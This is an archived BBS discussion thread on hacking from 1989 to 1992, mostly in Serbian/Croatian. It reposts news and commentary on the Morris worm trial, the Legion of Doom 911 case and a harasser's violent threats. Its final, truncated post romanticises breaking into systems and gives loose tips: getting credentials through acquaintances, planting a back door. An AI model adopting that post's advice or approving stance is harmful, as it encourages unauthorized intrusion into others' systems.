KOMUNIK.1

30 Oct 1989 - 13 Feb 1992

Topics

  1. terminologija (22)
  2. kom.programi (1139)
  3. arhiveri (130)
  4. protokoli (182)
  5. hayes.sekvence (70)
  6. nabavka.modema (68)
  7. hackers (86)
  8. javni.modemi (96)
  9. jupak (155)
  10. strani.bbs (199)
  11. yu.bbs (680)
  12. zgode (19)
  13. vax (634)
  14. mnp (198)
  15. email (244)
  16. modemi (332)
  17. radio (90)
  18. razno (549)

Messages - hackers

hackers.1 dejanr,
Pravila BBS ponašanja su očito zanimljiva tema za svaki BBS - ovde predstavljamo pravila koja je istakao američki Exec-PC BBS koji radi sa preko 100 linija i opslužuje hiljade korisnika. žitajući tekst primetićete, međutim, da se i tamo uglavnom radi o *korisnicima* - ženske korisnice su retkost! ───────────────────────────────────────────────────────────────── Bulletin Topic: Rules and guidelines for Exec-PC Copyright (c) 1989 Exec-PC All Rights Reserved Exec-PC Suggested Guidelines ---------------------------- After running this BBS for a few years, it is obvious Exec-PC has a mature and self-guiding group of callers. As any groups of people will do, there have been some disagreements about what conduct is proper on the BBS. I hope the following rules will serve as guidelines for those moments when you ask yourself "is it OK to do this on the BBS?" FILE SYSTEM RULES: 1. Don't upload COMMERCIAL SOFTWARE to the BBS. Public Domain, Shareware, Freeware, Demos are all fine. If in doubt as to what is legal, please go to the <H>elp system and read the topic "What is Legal for Distribution on a BBS". 2. Put your uploads in the proper file area. Picture files go in the Picture collection, PC and Compatible (except picture) go in Mahoney collection, MAC, Amiga and Atari go in the approprate collections. 3. Do not upload ads for your BBS. They will be deleted. 4. Do not upload sorted copies of our file lists. We don't want to use up disk space with duplicate material of that type. MESSAGE SYSTEM RULES: 1. *UNLESS* the TOPIC LEADER tells you otherwise, please stick as close to the topic as possible. For example, in the ADS conference, try to keep your message related only to an item for sale, an item you want to buy, or on discussion related to items that are for sale or wanted to buy. *IF* the topic leader encourages discussion not related to the topic, fine, that is the prerogative of the leader. It is his/her topic, he can run it the way he chooses. If there is a dispute, first direct it to your Topic Leader. If you are not satisfied with the response, then direct it to the Sysop. DON'T take it out on the other guy. 2. If you send a message that will generate some replies, please followup in a timely manner. I mean, if you place an AD, or if you ask for help, please come back every day and look for replies. It is rude to invite a response and then not read the response! 3. I don't like to see profanity in messages. I am not a prude, but many of the people who read the messages might be extremely offended at something you think is only slightly off color. While our audience is mature and can take care of themselves, offensive language only serves to blur your point and make people think you haven't thought out the issues you are discussing. 4. Avoid sexism! The male-to-female ratio on this BBS is sadly out of balance. Let's not insult each other on gender related topics. I don't just mean the men should not pick on the women - I have seen some pretty good men-bashing going on too! I admit some of it is fun when it starts out as mild teasing, but it usually gets out of hand and someone gets hurt, leaves the system in a huff, and might not ever come back! 5. Avoid racism. Same arguments as in item #3. That is it. Not many rules. What we are really saying is, BE COURTEOUS!
hackers.2 dveselinovic,
Pozdrav. Imenjace, mislim da mi nemamo mnoge probleme koji se ovde navode, sto ne znaci da nije bolje spreciti nego leciti. Ali, mislim da imamo tusta i tma zaista dobrih zapazanja i sugestija,a i konstruktivnih kritika (ref. Aca i Ilija). Pokupio sam ovo pa cu ovih dana to prevesti, neka postoji i na nasem jeziku. Dejan_V
hackers.3 dejanr,
U Americi je stvar zvana 'resume' vrlo važna za svakog stručnjaka - podaci o vama, šta ste radili, šta znate, šta vas interesuje, koliko žena, dece i pasa imate i tako to; bolji "životni rezime" automatski znači više posla, više $$$$ i tako to. Primera radi uz ovu poruku sam priložio 'resume' čoveka koji se zove Allen Ackerman, BIX name 'hack' - možda će vam čitanje teksta pomoći da, pre nego što se uputite "preko bare", sastavite odgovarajući tekst o sebi... resume.zip
hackers.4 dejanr,
U uvodniku decembarskog "Mog Mikra" čitao sam o novom zakonu o autorskim pravima koji bi konačno trebao da smrsi konce piratima. Večeras sam pre i na Klubu programera čuo neke nezvanične vesti prema kojima: 1) Ako vas ufate sa piratovanim programima, rizikujete novčanu kaznu do 100 milijardi 2) Ako vas ufate da piratujete softver, rizikujete 1-10 godina zatvora. U oba slučaja se konfiskuje oprema na kojoj je "zločin" izvršen. Takođe sam video nešto što tvrde da je nacrt zakona (i u kome zaista piše nešto slično ovome) ali mi je to što sam video pre ličilo na neki pred-predlog a ne na zakonski tekst. Nisam uspeo da ga dobijem "za poneti" ali mislim da ću ga pokupiti i kopirati ovih dana. Zanima me zna li neko nešto malo preciznije od rekla-kazala o ovom zakonu?
hackers.5 dejanr,
>> ako vas ufate... I sad se vi pitate kako da vas uhvate. Pre izvesnog vremena razgovarao sam sa čovekom koji je neki faktor u ekipi "Elektrodistribucije" koja šeta okolo i hvata ljude koji su premostili sat i tako kradu struju. Ja sam uvek mislio da oni proveravaju potrošnju, mere šta izađe iz trafo stanice i tako to, a on mi kaže: "Ma što bre da se mučim, pa 99% tih prekršitelja uhvatimo tako što ih komšije prijave". To je "Elektrodistribucija Beograd", Srbija...
hackers.6 vkostic,
Lepo je imati zakon, treba ga jos i sprovesti u delo. A dobro znamo da kod nas zakoni sluze da se ne postuju.
hackers.7 dejanr,
Verovatno si u pravu ali bih ja ipak voleo da znam neke detalje o tom zakonu - bar ako ga kršimo, da znamo šta radimo!
hackers.8 dejanr,
Uz ovu poruku ide RESUME jednog korisnika BIX-a koja je, po mom mišljenju, izuzetno interesantna. Korisnik je haker, vršljao je po sistemu, koristio lažne brojeve kreditnih kartica, uhvaćen, osuđen... imate celu priču o tome kako je prošao. žovek je uz to sasvim otkačen (izgleda da je i 'gay') ali mu je RESUME zanimljiv za čitanje. Drugi razlog za ovu poruku je što su nam svetske mreže sve otvorenije i što će hakerisanje po stranim sistemima biti sve češća zabava. Mislim da bi ovaj slučaj mogao da nas uveri da čitava ta stvar nije zezanje i da se treba uzeti u pamet dok ne bude kasno. yllar.zip
hackers.9 dejanr,
Kada smo već kod hakerisanja - sećate se onoga Roberta Morisa Juniora, sina jednog od vodećih američkih stručnjaka za bez- bednost kompjuterskih sistema, koji je u svoje vreme ubacio "crva" u kompletnu kompjutersku mrežu Internet po kojoj kolaju i razne vojne tajne. E, tom geniju ili banditu se upravo sudi i evo šta o tome kaže na BIX-u: ========================== microbytes/items #620, from microbytes, 2371 chars, Fri Jan 19 21:12:08 1990 -------------------------- TITLE: Morris Testifies Internet Worm Was "A Dismal Failure" Robert Morris Jr. took the stand yesterday and told a federal jury that he created the worm program that froze more than 6000 computers on the Arpanet and Internet systems last year. It was the first time Morris, 24, admitted publicly he had designed and launched the rogue program. Testifying in his own defense during his trial in Syracuse, NY, Morris told the court he was conducting an experiment. "My purpose was to see if I could write a program that would spread as fast as possible," he said. Morris explained the program was designed so the worm would spread quickly and undetected across the nationwide system. "It was a dismal failure," he said. Cross-examined by US Justice Department prosecutor Mark Rasch, Morris admitted that even if the program had worked, it would have penetrated computers he was unauthorized to use and that experts would have to have worked to detect and defeat the worm. Testifying for the prosecution earlier in the trial, US Army computer expert Michael Muuss, head of the Advanced Computer Systems team at the Ballistic Research Laboratory at Aberdeen Proving Ground in Maryland, said his first reaction to the worm was that his network was under attack by a foreign power. Muuss said the worm forced him to remove 200 computers from both military and research networks for nearly a week. It took 1500 man-hours for his department to straighten out the system, at a cost of more than $53,000, he said. To obtain a felony conviction, the prosecution needs to prove that Morris caused $1000 worth of damage. If convicted, Morris faces up to 5 years in prison and a $250,000 fine. The defense maintains the incident was merely an experiment gone berserk and that Morris did not intend to cause damage. Rochester University computer lab manager Liudivikas Bukys, who testified for the prosecution, told reporters outside the courtroom that he found the defense's argument appalling. "That's arguing that burglars are doing you a favor by showing you how crummy your locks are," he said. "This particular burglar raided every house on the block, and I guess the defense is arguing that now everybody in the whole neighborhood has better locks so they should feel safer." The jury is expected to begin deliberations on Monday. --- Jan Ziff ========================== security/main #532, from bstrauss, 2387 chars, Wed Jan 10 21:11:01 1990 -------------------------- TITLE: Internet "WORM" trial begins Items in brackets [] are my comments (From January 10, 1990 Chicago Tribune) (no author credited) SYRACUSE< N.Y. (AP) - Graduate student Robert T. Morris carefully plotted and executed a full-scale assault on a national computer network by setting loose a "worm" program, a federal prosecutor argued Tuesday. Morris "devoted a lot of time, energy and research to planning this assault" from his computer at Cornell University in Ithaca, Justice Department attorney Mark Rasch said in opening arguments. The suspended Cornell student from Arnold, Md., is the first person brought to trial under the 1986 Computer Fraud and Abuse Act. If convicted, Morris, 24, faces up to five years in prison and a $250,000 fine. [two paragraphs, describing the history of the event deleted] In his opening statements, defense attorney Thomas Guidoboni did not argue that Morris wasn't responsible for the worm program. He called its creation a "simple mistake" and "not the equivalent to a felony." [Interesting arugments - see the last paragraph of the story] "He made a critical mistake that caused the virus to spread much faster than he anticipated," Guidoboni said. Once he realized the problems the worm program could cause, Morris tried to notify those connected with the computer network, Guidoboni said. The defense attorney also played down the significance of the computer network itself. He said it was chiefly concerned with research and was "not a network that launched missiles and sends out armies." "This network was used for playing chess, sending love letters, sending recipies" and research Guidoboni said. The runaway program has been described as a "virus" but is more properly known as a "worm," which unlike a virus does not need a host program to duplicate itself. [A mediacritter who understands the difference and/or who asked the right questions and/or who listened to what s\he was told! - Will wonders never cease?] Morris, who was a first-year doctoral student in computer studies at Cornell, is the son of the chief scientist at the government's National Computer Security Center in Bethesda, Md. A Cornell commission concluded that Morris was guilty of "reckless disregard." Although the panel found him responsible, Morris has never publicly admitted creating the worm or unleashing it. -----Burton ========================== security/main #535, from hshubs, 164 chars, Sat Jan 20 17:28:48 1990 There is/are comment(s) on this message. -------------------------- TITLE: Morris, Jr. Well, now he's put his foot in his mouth. I wonder what people's feeling is about this. Personally, I hope they put him away for a long time. ========================== security/main #536, from bstrauss, 349 chars, Sat Jan 20 18:53:28 1990 This is a comment to message 535. There are additional comments to message 535. -------------------------- It will be interesting to see the defense - it seems the only thing he hasn't admitted it "intent to harm" and I'm not really sure that has to be shown to convict under the stature. Certainly Justice doesn't believe so - they've said publicly that if he's aquitted, they (Justice) will go back to Congress to get the laws re-written. -----Burton
hackers.10 dejanr,
Moris je proglašen krivim! Pročitajte: ========================== microbytes/items #626, from microbytes, 2097 chars, Tue Jan 23 18:04:31 1990 -------------------------- TITLE: Morris Convicted of Unleashing Internet Worm Robert Morris Jr. has been convicted of unleashing a program that froze 6000 computers on the national Internet computer network last year. Morris, 24, became the first person convicted under the 1986 Computer Fraud and Abuse Act on a felony charge; he could receive a 5-year sentence and a fine of up to $250,000. After several hours of deliberations, the jury returned the guilty verdict late last night. US District Judge Howard Munson released Morris on his own recognizance. There will be a hearing for new motions on February 27 in Albany, NY. Robert Morris Sr., the defendant's father and a chief scientist at the National Security Agency's computer security division in Maryland, said he thought the trial was fair. "Anyone would have come to the same conclusion," he said, but added that his son does not have "a fraudulent or dishonest bone in his body." The younger Robert Morris said nothing as he left the court. In closing statements, US Department of Justice trial lawyer Mark Rasch said, "The worm didn't break in by accident or mistake. Robert Morris intended for the worm to break in." Morris' lawyer, Thomas Guidoboni, countered by saying Morris made a programming mistake that inadvertently caused the program to wreak havoc in computers at universities and military installations. But prosecutor Ellen Meltzer told the jury that Morris took every conceivable step to avoid detection. "Each and every one of you must understand that the worm was not a mistake," she said. "It was a crime against the government of the United States." Meltzer said that Cornell University discovered at least 6 versions of the worm in Morris' computer accounts. She said that in his own remarks, Morris used the words "steal" and "break in." "These are not innocent words," Meltzer said, "and Robert Tappan Morris did not use these words by mistake." Her comment that "we do not thank a terrorist for increasing airline security" prompted an unsuccessful bid from the defense for a mistrial. --- Jan Ziff
hackers.11 zarkob,
Evo na CNN-u su opet rastrubili kako neki hakeri vrsljaju po mrezi i kradu spiskove passworda a uz put unistavaju razne podatke po sistemu. Ne nisu ih uhvatili no pitanje je zasto bi neko objavio takvu informaciju kad im izgleda nisu ni na tragu? Da nije to neki novi antihakerski zakon na pomolu u USA?
hackers.12 dejanr,
>> Ne nisu ih uhvatili no pitanje je zasto bi neko objavio takvu >> informaciju kad im izgleda nisu ni na tragu? Eh, eh, pa to je VEST!
hackers.13 dejanr,
Kako treba kazniti autore virusa i trojanskih konja, one koji provaljuju u sisteme i slične "vandale"? Ova diskusija sa BIX-a može da posluži kao lepa inspiracija za sličnu diskusiju ovde. Pozdrav, Dejan crit.zip
hackers.14 dejanr,
Uvek mislimo da smo samo mi narod koji ume da izigrava pravila. E pa nismo - na BIX-u nedavno uvedoše da se CBIX (to je chat podsistem) noću zatvara kako bi sistem bio malo manje opterećen. Naravno, ljudi su ludeli oko toga (biće tekst u "Računarima"). Danas je prvi dan da je to na snazi. I šta se dešava? Našli ljudi rupu u odluci - kaže da će CBIX biti otvoren ako se organizuje neki "događaj". Našlo se njih 15 da traže događaj koji će se zvati "dead dog party" i eno CBIX radi, ne da radi nego je duplo opterećeniji nego što je bio ranije. Kažu da će raditi i sutra. Biće "deat cat party". Imaju životinja za godinu dana!
hackers.15 dejanr,
Ovo sam pronašao na jednom "hakerskom" BBS-u. Origin 'The Lightning systems BBS' Board : Mid-Night Hacking Subject: More news... Sender : Sherlock Ohms (#1) Address: All Stampted: February 14th, 1990 9:11.56 PM ----------------------- More news about Knight Lightning and The Prophet and Phrack and 911, etc... ----------------------- [reprinted without permission from the Feb. 12th, 1990 issue of Telephony] ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA Dawn Bushaus, Assistant Editor Four alleged computer hackers were indicted last week on charges that they schemed to steal and publish proprietary BellSouth Corp. emergency data. The alleged activity could have produced disruptions in 911 networks nationwide, according to federal officials. The case could raise new concerns about the security of local exchange carriers' internal computer networks, which house data records on customers, equipment and operations. "Security has always been a concern for the telephone companies," said Peter Bernstein, an analyst with Probe Research. "If you can crack the 911 system, what does that say about the operational support system or the billing system?" A federal grand jury in Chicago handed down two indictments charging Robert J. Riggs, 20, of Decatur, Ga., and Craig M. Neidorf, 19, of Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act and interstate transportation of stolen property. Facing similar criminal charges in Atlanta are Adam E. Grant, 22, and Franklin E. Darden Jr., 23. The four, alleged to be part of a closely knit group of hackers calling themselves the Legion of Doom, reportedly participated in a scheme to steal the BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine known as "Phrack." The Legion of Doom reportedly is known for entering telephone companies' central office switches to reroute calls, stealing computer data and giving information about accessing computers to fellow hackers. According to the Chicago indictment, Riggs, also known as "The Prophet," stole a copy of the BellSouth 911 program by using a computer outside the company to tap into the BellSouth computer. Riggs then allegedly transferred the data to a computer bulletin board in Lockport, Ill. Neidorf, also known as "Knight Lightning," reportedly downloaded the information into his computer at the University of Missouri, Columbia, where he edited it for publication in the hacker magazine, the indictment said. The indictment also charges that the hackers disclosed the stolen information about the operation of the enhanced 911 system to other hackers so that they could illegally access the system and potentially disrupt or halt other systems across the country. The indictments followed a year-long investigation, according to U.S. Attorney Ira Raphaelson. If convicted, the alleged hackers face 31 to 32 years in prison and $122,000 in fines. A BellSouth spokesman said the company's security system discovered the intrusion, which occurred about a year ago, and the company then notified federal authorities. Hacker invasion in the BellSouth network is very rare, the spokesman said, adding that the company favors "stringent laws on the matter." The indictment solicited concern about the vulnerability of the public network to computer hacking.
hackers.16 dejanr,
Kako biste vi postupili u sledećem slučaju: NEKO ima pristup podacima sa nekog BBS-a (recimo, SysOp je). Pročita passworde glupih korisnika kao što sam ja tj. onih koji na svim BBS-ovima drže isti password (dobro, na SEZAM-u sam držao drugi - nisam baš TOLIKO blesav) i onda zove te BBS-ove u ime tog korisnika i koristi njegov vreme i njegov obično malo viši nivo da downloaduje fajlove i ko zna šta još radi. Pri tome greškom ponekad umesto passworda lupi neki svoj makro pa se njegove prave lozinke (nešto kao jedna firma što pravi video rikordere - nije JVC) upišu u log fajlove i na osnovu toga dotični bude lociran. Ovo VEOMA podseća na sve provale u kompjuterske sisteme: 1) Kada se objasni ne deluje ništa posebno pametno 2) Zasniva se na gluposti korisnika 3) Ne donosi posebno veliku korist. Šta mislite o kazni? Dejan PS Imena ovde ne pominjem ali će biti pomenuta u pravo vreme.
hackers.17 bulaja,
G U I L T Y ! ! ! ! L o c k H i m Up ! !
hackers.18 bojt,
>> Šta mislite o kazni? Da ga bijemo!
hackers.19 braca,
Najgora kazna za zavisnike BBS-a: zabrana pristupa!
hackers.20 ilja,
Osuditi ga da provede jedan dan sa i. čarkom i da mu ovaj to vreme objašnjava sve o komunikacijama. Posle bi toliko znao da mu više ne bi palo na pamet da pozove ni jedan BBS (a i kad bi mu palo na pamet ne bi umeo) pa bi se kazna postigla i bez nasilnih mera.
hackers.21 vkostic,
>> Najgora kazna za zavisnike BBS-a: zabrana pristupa! Menoguce ostvariti. Moze da se javi pod drugim imenom.
hackers.22 lanik,
Najgora kazna: Stavite ga na CHAT sa Ilijom!!! (najmanje 24 sata)
hackers.23 dejanr,
Šta kažete na presudu u slučaju Roberta Morisa (FORUM 25.92)?
hackers.24 dejanr,
Evo još malo komentara o presudi kojom se Robert Morris spasao zatvora: ========================== security/long.messages #51, from bstrauss, 4348 chars, Sat May 5 10:58:35 1990 -------------------------- *** Moved from security/main #612 of Sat May 5 10:21:56 1990 TITLE: _Computer Intruder [sic] Gets Probation And Find but Avoids Prison Term_ NY Times, Saturday, May 5, 1990 - Page 1 [items in braces are my summarizations and comments] SYRACUSE, May 4 - Saying the punishment of prison did not fit the crime, a Federal judge today placed a 25 year-old computer science student on three years' probation, fined him $10,000 and ordered him to perform 400 hours of commmunity service for intentionally disrupting a nationwide computer network. The sentencing of Robert Tappan Morris had been awaited with great interrest by computer security experts and those who try to evade them. The case, which began when Mr. Morris wrote a program that copied itself wildly in thousands of separate machines in November 1988, has become a symbol of the vulnerabilities of the computer networks that serve as the nation's highways in the age of instant information. Legal experts said the Government's decision to prosecute Mr. Morris, after an eight-month debate in the Justice Department, sent a strong message that tampering with computers, even when not intentionally destructive, was not acceptable. When Mr. Morris was found guilty last January, he became the first person convicted by a jury under the Federal Computer Fraud and Abuse Act of 1986. [Mr. Morris had no comment, Mom said "I still don't feel...my son is a felon", Dad said it was his son's decision whether to appeal, and the attorney said he would appeal.] "It was extremely difficult in this case to strike a fair balance between the unique circumstances surrounding Morris' conduct and our goal of detering future computer-related crime," Mr. Scullin [Frederick J. Scullin, the United States Attorney] said. "I think [Federal District] Judge [Howard G.] Munson's attempt to fashion a fair sentance was admirable, and I don't think it will weaken the resolve of the Federal authorities. It should be a message to all would-be computer hackers." [The government decided not to file sentencing recommendations because of the unusual nature of the case. Mark D. Rasch a Justice Department prosecutor said the government believed the sentance should include some prison time. However, the judge - who had questioned the wisdom of a felony charge in this case - did not follow the Federal sentencing guidelines which would have imposed 21 to 27 months of prison time.] [Judge Munson departed from the guidelines (and the probation officer's report which recommended 15 to 21 months in jail), because "[T]he characteristics of this case were not those of fraud and deceit," he said. New, manditory sentencing guidelines affect crimes committed after November, 1987 and require judges to use a point system to weigh mitigating and aggravating circumstances. Departing from the rules requires a written explaination from the judge. The government has 30 days to appeal the sentance.] [Government prosecutors portrayed the worm as a deliberate attack, while the defense centered on the contention that the attack was not intentional but rather because of a coding error.] Many computer security experts said that the case was a poor one to use to try to set and example for theose who would try to break into the nation's computers. "This wasn't the appropriate test case," said Peter Neumann, a computer scientist who specializes in computer security issues at SRI international in Menlo Park, Calif. But he said that the case did highlight the many security flaws in the nation's computer networks and pointed up the fact that much work still needs to be done to improve computer security. "We have an opportunity to improve things," he said. "We better take that lesson away from this trial." [I have to echo Peter Neumann's statements - this wasn't the best test case for the 1986 law. Never-the-less, it's the first one which ended up in court and I'm disturbed by the "slap on the wrist" nature of the sentance. If the judge imposed 20 months in prison and then suspended it, I'd feel a bit better.] [The fact that he's sorry and didn't intend his experiment to screw-up the system, but did so because of a coding error just doesn't cut it. You do these types of experiments under controlled circumstances, not out in the open.] -----Burton
hackers.25 dejanr,
========================== security/main #619, from hshubs, 865 chars, Mon May 7 01:13:23 1990 -------------------------- **COPIED FROM: ========== law/other #2260, from ssatchell, 746 chars, Sun May 6 14:34:56 1990 ---------- TITLE: Wierd appliation of innkeeper law? After seeing some rather caustic comments about Morris and some of the byplay about thieves and locks, I started thinking about parallel situations. Then it hit me. Innkeepers. The innkeeper is responsible for the actions of the people staying with him, by law. When the innkeeper puts locks on the doors and takes every reasonable action to control keys, that innkeeper's liability stops at the individual room's door. If the system administrator takes every reasonable action -- and such action would require that sysadmin to fix known holes in his security -- then you could be justified in tossing Morris into the can and throwing away the key. That simply isn't the case here, IMHO.
hackers.26 dejanr,
NY Times, Editorial Page, May 8, 1990 _Hacker's License_ Robert Tappan Morris is the Oliver North of computer abuse. The graduate student whiz committed a felony punishable by prison: tyring up 6,000 computers with an electronic "worm" that spread wildly through interconnected machines. Yet Federal Judge Howard Munson in SYracuse sentenced him only to 400 hours of community service and a $10,000 find. That light penalty won't deter other hackers from trespassing on information systems. America's baning, communications, information, travel and research systems depend on computers. Tempering with them isa profoundly antisocial act. Mr. Morris testified that he didn't intend all the consequences of his escapade, but he planned it knowing there was a law against it. He also pointed out that by demonstrating vulnerabilities to outside penetration, he has contributed to tighter system security. This is like defending a virus because it produces antibodies. The 1986 Federal Computer Fraud and Abuse Act appears to allow as much as five years in prison for such a crime. But Judge Monson said he couldn't fit Mr. Morris's crimes with the Federal Sentencing Guidelines that require some incarceration. As with Mr. North and others convicted of white collar crimes, even a taste of prison would have resistered the seriousness of the offense - and given future whiz kids a clearer idead of the cost of penetrating other people's computers. -----Burton P.S. (offered without comment) the next piece dealt with the inability of weather forecasting and closed "Perhaps weather forecasting has gotten too scientific, what with computers and satellites and tropical depressions. What's wrong with heeding the ache in grandpa's leg or, Heaven forbid, looking out the window?"
hackers.27 dejanr,
========================== tojerry/onions #2706, from blade_runner, 421 chars, Thu May 10 19:17:56 1990 -------------------------- TITLE: Slimeballs COMPUTER HACKERS CAUGHT: The largest network of computer hackers has been apprehended. A spokesman for the U.S. Attorney in Phoenix, Ariz., says the hackers bilked the phone company out of $50 million using stolen phone and bank credit cards. Hackers unsuccessfully tried to infiltrate hospital computers and block incoming calls to the 911 emergency service in Chicago. Five men have been arrested.
hackers.28 dejanr,
Mislim da sam obećao opširne izvode sa BIX-a o slučaju Morris. Zapravo, o slučaju se zna - i šta je radio (čak i kako je provalio u mrežu sa tehničke strane), i kakvu je štetu napravio, i kako je uhvaćen, i kako mu je suđeno, i koliku je (uslovnu) kaznu zaradio... Međutim, radi se o presedanu koji je izazvao brojne komentare u raznim BIX konferencijama a bilo je i dosta oštrijih replika da ne kažem svađe. Ovde sam pripremio izvode sa dve konferencije - security/main i tojerry/onions. Za download ima dosta a i čitanje će potrajati ali možda vredi truda. Za "udicu" evo jedne od poruka iz arhive koja se odnosi na drugi, unekoliko sličan slučaj: ========================== tojerry/onions #2752, from jdow, 2678 chars, Sat May 12 04:16:37 1990 This is a comment to message 2729. -------------------------- Sigi Kluger is an apparent psychopath who was a vendor support moderator for an unsuspecting company. (They certainly had no involvement in Sigi's attacks.) He would wait until the system looked "safe" and drop off and immediately crack his way into the system with id's that were variants of "motherf<etc>" and "<blackperson> <sexual-intimator>" etc. He would then machine post tens to hundreds of messages containing racial, religious, and political hate messages. He would also pepper the mail system with several messages to each woman moderator (and some non-moderators) with messages detailing how he was going to cut off our breasts with knives and feed them to his dog and then rape us then repeat with the knife and so forth with a whole (and varied) litany of terror. He cost me a lot of sleep wondering if "nf" knew my address. (It turns out he could have found it with information he had.) I slept with a loaded double barrel shotgun and a revolver for most of that year and a bit beyond. One morning I was lying in bed and a form slips by my balcony window. Now that window is third story so there should be nobody there. I pulled the pistol and looked. What I saw was kid shaped so I didn't shoot. But it was a very close thing and I am still paranoid about it. What price can I put on what Sigi did to me? What he did to bjc, mhofkin, rjp, etc etc? What price can be placed on the virulent hate pouring from his messages and what this did to BIX's reputation during some critical startup days? (I believe several folks quit in disgust. Fortunately most recognized a sick mind at work and accepted that TPTB were working to track this <censored> down. All the FBI ever "heard" in regards his deeds is the credit card fraud. The threats meant nothing. The courts saw it the same way. It mattered not how much sleep how many people missed. For all this and more Sigi Kluger received a $1000 fine and a suspended sentence. I get sour satisfaction that it also cost him his job here in the US (he is a German citizen), his house, and killed his bank balance. ANd because one condition of probation was being employed he finally had to return to Germany. It took be several months to accept he was gone from the US. Until then I slept with that shotgun and pistol. ANd for a while I might have carried that pistol around in my purse during the days. And then again I might not have. (I did some very rational and some very irrational things in reaction to those threats. Some of them scared sh** out of me.) And all Sigi was trying to do is point out how easy it was to do what he did. At least that is one defense I heard. <brown steaming exctemental matter>!) morris.zip
hackers.29 dejanr,
Ovako za početak diskusije :) , nekako sam sklon da se složim sa onima koji su imali simpatija za Morisa i smatrali da je relativno blaga kazna korektno odmerena. Pre svega, ne verujem da je on HTEO da napravi toliku štetu, drugo prijavio se sam kad je video šta se dešava, treće posle toga su sistemi stvarno postali bezbedniji... Sličnu "simpatiju" uopšte ne osećam prema autorima virusa.
hackers.30 dejanr,
Diskusiju o Morrisu nastavićemo u SEZAM/HACKERS (nova tema). Tamo su DETALJNI izvodi iz diskusije na BIX-u.
hackers.31 dejanr,
Mali dodatak: ========================== security/main #798, from bstrauss, 224 chars, Sat Jun 2 13:13:17 1990 -------------------------- TITLE: Government to accept Morris' sentance Per today's NY Times, the Government has decided not to appeal the sentance imposed on RTMjr. Offered solely for your edification and not to ignite another rwar...
hackers.32 dkropek,
Povodom poruka koje sam procitao u konferenciji FORUM, pod temom TRAC, a odnose se na hakerisanje po sistemima. Do sada nisam uspio doci do neke prihvatljive definicije tko/sto je haker. Po mojem licnom misljenju, hakere mozemo podijeliti na vise vrsta, od kojih su dvije glavne: hakeri na vlastitim racunalima i hakeri na sistemima. Vjerujem da se mnogi bave i jednim i drugim. Meni je licno npr. draze hakerisanje po sistemima, sto je mozda posljedica toga sto sam prvo sjeo za tastaturu jednog terminala, a zatim za ZX-a. Sebe licno ne smatram hakerom, zbog toga jer ne provodim dovoljno vremena cackajuci po nekim skrivenim i nedokumentiranim mogucnostima racunala. Radim (istrazujem, cackam, hakerisem...) samo onda kad mi je nesto hitno potrebno, a i onda vise volim da upitam nekog za misljenje tj. za savjet kako sto uraditi, nego da gubim vrijeme na sitnicama. Dakako da je ljepse i sladje kad se vlastitim znanjem i trudom dodje do rezultata, ali vrijeme je novac, a novac nije sve u zivotu, ali jeste barem 50% svega... Ljude koji su spomenuti u FORUM/TRAC poznajem direktno ili indirektno i dolazim do zakljucka da se sve svodi na dvije protivnicke strane: operatere i hackere. Hakerima je u interesu da provale zastitu, koju su im nastavili sistemski programeri i koju odrzavaju oprateri, a operateri se trude da sistem savrseno djeluje. Sistem je postavljen da sluzi necem korisnom, a operateri kao sastavni dio sistema (posao im je da obavljaju sve funkcije za koje sistem nije dovoljno inteligentan (iako nije potrebna neka narocita inteligencija ;-) )) da osiguraju stvarnom korisniku da nesmetano radi i koristi sistem, za koji placa procesorsko vrijeme. Sve se moze pojednostavniti ako zamislimo sistem kao jedan brod. Na brodu postoji kapetan i posada. Dio posade na komandnom mostu su operateri. Korisnici sistema su putnici, koji placaju kartu za sebe i za prtljagu koju ukrcavaju na brod. Hakeri su slijepi putnici koji ce se svercati na brodu na teret posade i putnika, a moraju se samo ukrcati na brod. Ukoliko je brod velik i ima mnogo mjesta, onda se hackeri mogu voziti neprimjetno i koristiti sve pogodnosti koje brod pruza. Za mali brod situacija se mijenja. Operateri ubrzo upoznaju korisnike i nema svercanja ili ako ga ima onda moraju hakeri koristiti kabinu korisnika i ponekad mu pojesti rucak ili veceru, a osim toga, moraju se skrivati u potpalublju. Kod velikih, prekooceanskih brodova, mozemo se prosvercati i na drugi kontinent... Kod svega ovoga postoji nekoliko kriticnih momenata, a to su: ukrcavanje na brod, koriscenje tudje kabine, slistavanje tudjeg rucka, iskrcavanje i ponovo ukrcavanje. Sve je daleko lakse ukoliko poznajemo brod. Kada upoznamo brod i sve njegove skrivene kutke, kao i nacin rada posade, mozemo nesmetano raditi sve sto nam je volja, u okviru utvrdjenih mogucnosti. Naravno, da bismo upoznali brod, moramo se ukrcati na njega. To se moze uraditi na vise nacina. Jedan od najlosijih je ukucavanje nasumce username/passworda, nadajuci se gluposti korisnika, pa ako uspije... Na zalost, vec na tom koraku je Yadro alias Wizard zapeo. Srecom otkrio je drugi nacin za ulazak na sistem, pa i malo vise od toga... Uvijek postoji neki prijatelj(ica) koji zna jos po nekog prijatelja(icu), pa se tako dodje do nekog username/passworda koji nije bas ono sto mi trazimo, ali moze posluziti... Na zalost, ovdje Wizard radi jos jednu gresku: koristi mali password za sve ono sto je uspio otkriti i ne razmisljajuci da ce jednog dana netko zavrnuti slavinu... Trebao je pripremiti mala vrata na ulazak na sistem, ali on se toliko veselio i brckao u poplavi informacija da se nenadano odjednom nasao na suhom. Priznajem, JUPAK je zanimljiv, ali do njega treba doci. Naravno, treba se i temeljitije pripremiti. Nisu ni operateri svemoguci. Uostalom, veliki sistemi se uvijek tesko prate i stite. Naravno, Yadro je jos dobro prosao, sjetimo se samo Morisa, koji je za opomenu ostalima proglasen kriminalcem i samo zato jer je imao bug u programu. Moris je zelio uraditi pravu stvar (bez onih glupih kritika molim, u stilu: kako bi to bilo kad bi svaki tako mogao ...) da ima globalnu kontrolu nad svim sistemima. Jednostavno bi postao informaticki Bog, ali smrtni bogovi nisu zakonom dozvoljeni. Ja sam svoju lekciju o hakerisanju po sistemu dobio prije nekoliko godina, kad sam bio samo mali praktikant kao ispomoc operaterima. Naravno, nisam bio zadovoljan samo stampanjem lista za korisnike i mjenjanjem magnetnih traka, te kuckanjem po konzoli, vec sam poceo naivno istrazivati cega sve ovdje ima. Na zalost, tamo je bilo mnogo vise toga od onog sto sam ja vidio. Nakon provale ko-je-to-uradio, bio sam pozvan na jedan poluprijeteci razgovor zasto-se-to-nesmije. Od onda vise ne kuckam bez veze passworde po terminalima, da me slucajno ne izbace naglavacke van. Ukoliko 